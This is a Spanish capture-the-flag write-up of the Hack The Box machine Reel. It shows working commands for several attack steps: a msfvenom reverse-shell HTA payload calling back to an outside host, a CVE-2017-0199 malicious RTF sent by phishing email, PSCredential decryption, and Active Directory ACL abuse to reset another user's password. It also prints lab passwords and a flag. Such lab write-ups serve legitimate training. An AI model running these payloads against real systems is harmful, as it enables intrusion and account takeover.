REEL - HackMD

# REEL ## Reconocimiento ### nmap ``` nmap -sS --min-rate 5000 -vvv -p- -Pn 10.10.10.77 -oG allPorts ``` ![](https://i.imgur.com/2JP7pxl.png) ``` nmap -sCV -p21,22,25 -Pn 10.10.10.77 ``` ![](https://i.imgur.com/3AaVMpO.png) ![](https://i.imgur.com/sdDgAn5.png) ``` ftp 10.10.10.77 Name (10.10.10.77:cr4y0): anonymous Password: ``` ``` prompt off mget * ``` ![](https://i.imgur.com/4O1fJcK.png) ![](https://i.imgur.com/FUVp2vf.png) Una de las cosas a hacer es ver si existen macros o los metadatos ``` #olevba AppLocker.docx ``` ![](https://i.imgur.com/LYNrJlF.png) ``` exiftool AppLocker.docx exiftool Windows\ Event\ Forwarding.docx ``` ![](https://i.imgur.com/KpOLtV6.png) Como tenemos el SMTP abierto, probaremos conectarnos con telnet: ![](https://i.imgur.com/p0ykagP.png) Y podemos intentar validar un usuario enviandole un mensaje ![](https://i.imgur.com/ybYlZoX.png) Otra forma alternativa de enumerar usuarios por smtp se puede probar `smtp-user-enum` ``` cat users.txt ``` ![](https://i.imgur.com/UgBidMX.png) ``` smtp-user-enum -M RCPT -U users.txt -t 10.10.10.77 ``` ![](https://i.imgur.com/elKxKmo.png) Usaremos la herramienta `sendemail` Como se debe enviar un archivo RTF `RTF malicious file remote command execution` ![](https://i.imgur.com/dBDfkrO.png) ``` msfvenom -l formats | grep "hta" ``` ![](https://i.imgur.com/P2mQHTi.png) ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f hta-psh -o rev.hta ``` ![](https://i.imgur.com/IpyZMZ0.png) ``` python cve-2017-0199_toolkit.py -M gen -u http://10.10.14.2/rev.hta -w salario.rtf -t RTF -x 0 ``` ![](https://i.imgur.com/uUjbYM2.png) Se ha generado un archivo `salario.rtf` ``` python3 -m http.server 80 ``` ![](https://i.imgur.com/vKneDEK.png) ![](https://i.imgur.com/ma7wbxr.png) ``` sendemail -f cr4y0@megabank.com -t nico@megabank.com -u "IMPORTANTE" -m "Este es el mensaje" -s 10.10.10.77 -a salario.rtf -v ``` ![](https://i.imgur.com/R0QglsE.png) Se establece una conexión por revershell. ![](https://i.imgur.com/zCKWXSu.png) ## Acceso ![](https://i.imgur.com/q3lvcI8.png) ![](https://i.imgur.com/9rAECoX.png) type user.txt fa363aebcfa2c29897a69af385fee971 ``` type cred.xml ``` ![](https://i.imgur.com/x1Yc4fe.png) Un archivo en un objeto representado el cual involucra un PSCredential. Esto es una forma potencial de almacenar usuarios, contraseñas y credenciales pero hay ciertas funciones ImportCLI-Xml y ExportCLI-Xml que a través de Powershell se puede intentar restaurar la credencial en base a este archivo. ``` powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential()" ``` ![](https://i.imgur.com/7CcbVfN.png) ``` powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List" ``` ![](https://i.imgur.com/gzrIWDS.png) ``` UserName : Tom Password : 1ts-mag1c!!! ``` ``` ssh tom@10.10.10.77 tom@10.10.10.77's password: 1ts-mag1c!!! ``` ![](https://i.imgur.com/32kekfe.png) ![](https://i.imgur.com/a2RUcC8.png) ``` impacket-smbserver smbFolder $(pwd) -smb2support ``` ![](https://i.imgur.com/R972C1f.png) ``` copy acls.csv \\10.10.14.2\smbFolder ``` ![](https://i.imgur.com/rpexfyO.png) Visualizando el acls.csv ![](https://i.imgur.com/TGM5g3D.png) EL usuario tom tiene WriteOwner sobre el usuario claire Un atacante puede abusar del permiso WriteOwner para cambiar el propietario del objeto a un usuario controlado por el atacante y apoderarse del objeto. Establecer a tom como propietario de la ACL de claire ``` Set-DomainObjectOwner -identity claire -OwnerIdentity tom ``` ![](https://i.imgur.com/0UmGCTV.png) Otorgue permisos a tom para cambiar las contraseñas en esa ACL ``` Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword ``` ![](https://i.imgur.com/UbwDFLm.png) Crear credencial de powershell y cambiar credenciales ``` $cred = ConvertTo-SecureString "cr4y0123!" -AsPlainText -force Set-DomainUserPassword -identity claire -accountpassword $cred ``` ![](https://i.imgur.com/4WEa3Mk.png) ![](https://i.imgur.com/KdsMfK6.png) ![](https://i.imgur.com/uYDvu6B.png) ``` net group backup_admins ``` ![](https://i.imgur.com/UeSVc3w.png) ``` net group backup_admins claire /add ``` ![](https://i.imgur.com/t59zoXy.png) ``` net user claire ``` ![](https://i.imgur.com/LX3Skee.png) ![](https://i.imgur.com/WGtKrKW.png) `Cr4ckMeIfYouC4n!` ![](https://i.imgur.com/3ua7DSc.png) ![](https://i.imgur.com/de6LKgM.png)